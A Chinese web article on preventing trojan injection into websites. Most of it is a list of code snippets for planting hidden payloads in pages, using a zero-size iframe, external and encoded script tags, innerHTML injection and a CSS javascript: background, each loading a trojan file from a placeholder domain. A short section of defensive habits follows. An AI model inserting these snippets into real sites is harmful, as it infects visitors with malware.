防止网站被挂马的技巧
一、最简单的也是最有效的
<iframe src=http://www.domain.com/muma.html width=0 height=0></iframe>
二、js挂马
<script src=http://www.domain.com/muma.js></script>
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.domain.com/muma.txt></script>muma.txt可改成任意后缀的
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.domain.com/muma.htm/"></iframe>';
五、Css中挂马
body {background-image: url('javascript:document.write("<script src=http://www.domain.net/muma.js></script>")');}
css因为可以把内容提取到css文件,所以比较隐蔽...
六、Flash挂马
木马不是中了以后再找就能解决问题,要从源头解决问题,代码严谨,服务器权限设置,补丁及时更新都是比较不错的方法
防止中毒也不一定要靠杀毒软件,好的上网习惯等等都是很不错的方法 。
注意上网的原则:
1.色 S。 E。X站尽量不去。
2.浏览器开的话平时尽量屏蔽Javascript 图片 Active控件等,除非必须要用到这些再开启...而且如果那个网址你不经常去,要看一些网页源文件,看有没上边偶提到的那几种挂马的东东在。
3.邮件附件不确定的不下载,下载也杀毒,别人给的文件也不接,除非是自己需要的文件。
4.系统补丁一定即使更新,这个比杀毒有用。
获得更多 -> 组网通信 -> 域网维护责任编辑: webmaster >>> 百度上搜索 谷歌上搜索
点击复制本连接 (http://www.hugesky.com/showarticle.php?id=6207)>>> 相关资讯:
【声明】: 以上文章或资料除注明为电脑技巧原创或编辑整理外,均为网络收集整理或网友推荐。以上内容以共享、参考、研究为目的,不存在任何商业目的。 未注明作者或出处的文章,可能资料来源不规范。如有涉及版权请给予及时联系更正或予以删除。 |